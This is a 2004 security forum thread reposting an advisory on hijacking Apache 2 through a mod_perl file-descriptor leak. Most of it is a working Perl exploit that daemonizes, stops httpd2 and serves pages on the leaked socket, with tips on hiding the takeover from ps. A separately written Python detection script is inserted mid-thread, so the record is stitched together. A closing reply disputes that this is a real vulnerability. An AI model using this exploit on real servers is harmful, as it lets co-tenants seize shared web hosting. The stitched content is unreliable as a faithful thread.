GaLiaRePt
Jan 22 2004, 10:07 PM
Apache 2 Daemon HiJacking via mod_perl File Descriptor Leak Exploit
Date: 2004-01-22
Author: Steve Grubb <linux_4ever@yahoo.com>
Download: http://www.security-corporation.com/downlo..._perl-sploit.pl

#!/usr/bin/perl
###############################################################################
#
# Hijacking Apache 2 via mod_perl
#
# The technique is simple.
#
# 1) Fork and daemonize yourself.
# 2) Do something evil to apache.
# 3) Select on the leaked descriptor and start serving pages.
#
# At the end of this advisory is a proof-of-concept program that you can run under mod_perl. It is assumed
# that paying customers can ftp anything they want into their website and mod_perl scripting is enabled.
#
# cp mod_perl-sploit.pl /var/www/perl
#
# lynx http://localhost/perl/mod_perl-sploit.pl
#
# Now, ps -ef to see how things are going:
#
# apache 3107 2652 0 17:00 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2
# apache 3108 2640 0 17:00 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2
#
# So far, so good...
#
# lynx http://localhost
#
# And you should see the "You're owned" message. The really sneaky part is that 'ps -ef'
# gives only a minor hint that apache has been replaced. The only way to tell something is
# abnormal is that there's only 2 apache instances when a normal Mandrake server in its
# default configuration shows 5 instances. But, forking off a few decoy children should
# be easy enough to do.
#
# This was tested on a fully updated Mandrake 9.2 system.
#
###############################################################################

use POSIX qw(setsid);

if (!defined(my $pid = fork)) {
    print "Content-Type: text/html\n\n";
    print "cannot fork: $!";
    exit 1;
} elsif ($pid) {
    # This is the parent
    sleep(1);
    print "Content-Type: text/html\n\n";
    print "<html><body>Exploit installed</body></html>";
    system '/usr/sbin/httpd2 -k stop';
    sleep(2);
    exit 0;
}

# This is the Child
setsid;
sleep(2);
my $leak = 4;
open(Server, "+<&$leak");
while (1) {
    my $rin = '';
    vec($rin, fileno(Server), 1) = 1;
    $nfound = select($rout = $rin, undef, undef, undef);
    if (accept(Client, Server)) {
        print Client "HTTP/1.0 200 OK\n";
        print Client "Content-Length: 40\n";
        print Client "Content-Type: text/html\n\n";
        print Client "<html><body>";
        print Client "You're owned.";
        print Client "</body></html>";
        close Client;
    }
}
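A defender-side check built on the "minor hint" the advisory mentions, as an added example that is not part of the advisory or of this thread: it parses `ps -ef` output and flags httpd workers whose parent is not the root-owned httpd master, which is what a daemonized, reparented process looks like in the process table. The process table below is constructed, with two rogue entries modelled on the advisory's snippet; the script name and the `rogue_httpd` helper are hypothetical.

```python
"""Flag httpd worker processes whose parent is not the httpd master.

Hypothetical detection helper (not from the advisory).  A worker forked
from a mod_perl script and then daemonized is no longer a child of the
root httpd master, so its PPID stands out in `ps -ef` output.
Usage on a live box:  ps -ef > ps.txt && python3 check_httpd_tree.py ps.txt
"""
import sys

# Constructed sample in `ps -ef` layout: a healthy tree (master 2600 owned
# by root, workers parented by 2600) plus two httpd2 processes whose parents
# are not the master, modelled on the advisory's ps snippet.
SAMPLE_PS = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 16:50 ?        00:00:01 init
root      2600     1  0 16:55 ?        00:00:00 httpd2 -f /etc/httpd/conf/httpd2
apache    2601  2600  0 16:55 ?        00:00:00 httpd2 -f /etc/httpd/conf/httpd2
apache    2602  2600  0 16:55 ?        00:00:00 httpd2 -f /etc/httpd/conf/httpd2
apache    3107  2652  0 17:00 ?        00:00:00 httpd2 -f /etc/httpd/conf/httpd2
apache    3108  2640  0 17:00 ?        00:00:00 httpd2 -f /etc/httpd/conf/httpd2
"""


def parse_ps(text):
    """Return {pid: (uid, ppid, cmd)} from `ps -ef` output, skipping the header."""
    procs = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 7)  # UID PID PPID C STIME TTY TIME CMD
        if len(parts) < 8:
            continue
        procs[int(parts[1])] = (parts[0], int(parts[2]), parts[7])
    return procs


def rogue_httpd(procs, name="httpd2"):
    """PIDs of httpd processes that are neither the master nor its children.

    The master is the root-owned httpd whose own parent is init (PID 1);
    every legitimate worker should have the master as its PPID.
    """
    masters = {pid for pid, (uid, ppid, cmd) in procs.items()
               if cmd.startswith(name) and uid == "root" and ppid == 1}
    return sorted(pid for pid, (uid, ppid, cmd) in procs.items()
                  if cmd.startswith(name) and pid not in masters
                  and ppid not in masters)


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PS
    for pid in rogue_httpd(parse_ps(text)):
        print("suspicious httpd worker: pid", pid)  # prints 3107 and 3108 for the sample
```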
JeiAr
Jan 22 2004, 10:53 PM
If you read the discussion about this on BugTraq you will see that it really isn't a vuln at all.
Best Regards